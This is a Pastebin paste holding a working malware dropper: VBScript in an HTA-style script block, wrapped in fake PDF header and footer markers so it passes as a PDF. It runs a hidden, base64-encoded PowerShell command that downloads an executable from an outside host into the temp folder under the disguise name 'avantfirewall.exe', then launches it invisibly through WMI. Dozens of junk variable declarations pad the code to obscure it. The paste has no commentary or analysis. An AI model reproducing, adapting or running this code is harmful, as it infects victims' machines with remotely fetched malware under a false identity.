Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- %PD<script LAnGUaGE="VBScrIPt">
- Function PinkPandasOfChina()
- Dim Sheelll
- Dim binlanderDDe121
- Dim binlanderDDe1211
- Dim binlanderDDe1212
- Dim binlanderDDe1213
- Dim binlanderDDe1214
- Dim binlanderDDe1215
- Dim binlanderDDe1216
- Dim binlanderDDe1217
- Dim binlanderDDe1218
- Dim binlanderDDe1219
- Dim binlanderDDe12199
- Set binlanderDDe121 = CreateObject("Wscript.Shell")
- Dim binlanderDDe121999
- Dim binlanderDDe1211999
- Dim binlanderDDe1212999
- Dim binlanderDDe1213999
- Dim binlanderDDe1214999
- Dim binlanderDDe1215999
- Dim binlanderDDe1216999
- Dim binlanderDDe1217999
- Dim binlanderDDe1218999
- Dim binlanderDDe12199999999
- Dim binlanderDDe121999999
- temp = binlanderDDe121.expandEnvironmentStrings("%TmP%")
- Dim binlanderDDe1219888
- Dim binlanderDDe121108888
- Dim binlanderDDe121118888
- Dim binlanderDDe121128888
- Dim binlanderDDe121138888
- Dim binlanderDDe121148888
- Dim binlanderDDe121108888888
- Dim binlanderDDe121118888888
- Dim binlanderDDe1211288888888
- Dim binlanderDDe12113888888888
- Dim binlanderDDe121148888888888
- binlanderDDe121.run "powershell -noprofile -noni -W Hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBhAGUAZwAuAHQAbQBjAC4AbQB5AGIAbAB1AGUAaABvAHMAdAAuAG0AZQAvAHgAeAAvAGoAdQBkAGUALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGEAdgBhAG4AdABmAGkAcgBlAHcAYQBsAGwALgBlAHgAZQAiACkAKQA7AA==", 0, true
- Dim binlanderDDe1219666666666666666
- Dim binlanderDDe121105555
- Dim binlanderDDe121115555
- Dim binlanderDDe121125555
- Dim binlanderDDe121135555
- Dim binlanderDDe121145555
- Dim binlanderDDe1211055558
- Dim binlanderDDe1211155588888
- Dim binlanderDDe12112555558888
- Dim binlanderDDe12113555588888
- Dim binlanderDDe1211455558888
- Dim binlanderDDe12110555599999
- Dim binlanderDDe1211155559999
- Dim binlanderDDe12112555559999
- Dim binlanderDDe1211355559999
- Dim binlanderDDe1211433333
- End Function
- Sub window_onload
- const impersonation = 3
- Const HIDDEN_WINDOW = 12
- Set Locator = CreateObject("WbemScripting.SWbemLocator")
- Set Service = Locator.ConnectServer()
- Service.Security_.ImpersonationLevel=impersonation
- Set objStartup = Service.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = HIDDEN_WINDOW
- Set Process = Service.Get("Win32_Process")
- Error = Process.Create("CMd /c %TmP%\avantfirewall.exe", null, objConfig, intProcessID)
- window.close()
- end sub
- PinkPandasOfChina
- self.close
- </script>
- %%EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement